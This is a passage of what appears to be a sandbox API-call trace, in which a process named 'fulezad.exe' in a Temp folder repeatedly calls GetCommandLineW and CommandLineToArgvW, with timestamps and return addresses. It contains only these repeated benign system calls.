lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285598*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285610*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285688*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285700*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.812] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.812] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.812] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.812] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2858f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.812] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.812] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2859e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.812] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285a60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285ad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285b50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285bc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285c40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285cb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285d30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285da8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.813] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285e20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.813] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285e98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285f10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285f88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2860f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2861e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.814] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.814] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2862d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2863c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2864b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2865a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.815] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.815] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2868f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2869e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.816] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.816] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286a60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286ad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286b50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286bc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286c40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286cb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286d30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286da8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286e20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.817] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286e98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286f10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x286f88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2870f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2871e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2872d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.818] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.818] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2873c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2874b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2875a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.819] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.819] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.820] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x287808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.820] GetCommandLineW () 